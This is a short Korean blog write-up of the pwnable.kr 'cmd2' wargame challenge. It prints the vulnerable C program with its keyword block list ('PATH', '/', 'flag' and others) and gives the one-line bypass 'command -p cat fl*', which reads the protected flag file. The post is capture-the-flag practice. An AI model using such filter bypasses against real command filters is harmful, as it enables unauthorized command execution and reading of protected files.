본문 바로가기

포너블

[포너블/pwnable.kr] cmd2

#include <stdio.h>
#include <string.h>

int filter(char* cmd){
        int r=0;
        r += strstr(cmd, "=")!=0;
        r += strstr(cmd, "PATH")!=0;
        r += strstr(cmd, "export")!=0;
        r += strstr(cmd, "/")!=0;
        r += strstr(cmd, "`")!=0;
        r += strstr(cmd, "flag")!=0;
        return r;
}

extern char** environ;
void delete_env(){
        char** p;
        for(p=environ; *p; p++) memset(*p, 0, strlen(*p));
}

int main(int argc, char* argv[], char** envp){
        delete_env();
        putenv("PATH=/no_command_execution_until_you_become_a_hacker");
        if(filter(argv[1])) return 0;
        printf("%s\n", argv[1]);
        system( argv[1] );
        return 0;
}

 

뭔가 전체적인 로직 자체는 cmd1과 비슷하다.

 

/bin/cat flag” 를 실행시킬 수 있다면 flag를 얻을 수 있어 보인다.

하지만 cmd1 과 다르게 / 도 필터링 해 주는 모습이다.

 

이 문제는 command 명령어의 -p 옵션을 사용해 주면 쉽게 풀린다.

command -p cat fl*

'포너블' 카테고리의 다른 글

[포너블/pwnable.kr] shellshock  (1) 2023.09.02
[포너블/pwnable.kr] blukat  (0) 2023.08.30
[포너블/pwnable.kr] cmd1  (0) 2023.08.30
[포너블/pwnable.kr] passcode  (0) 2023.08.30
[포너블/pwnable.kr] blackjack  (0) 2023.08.30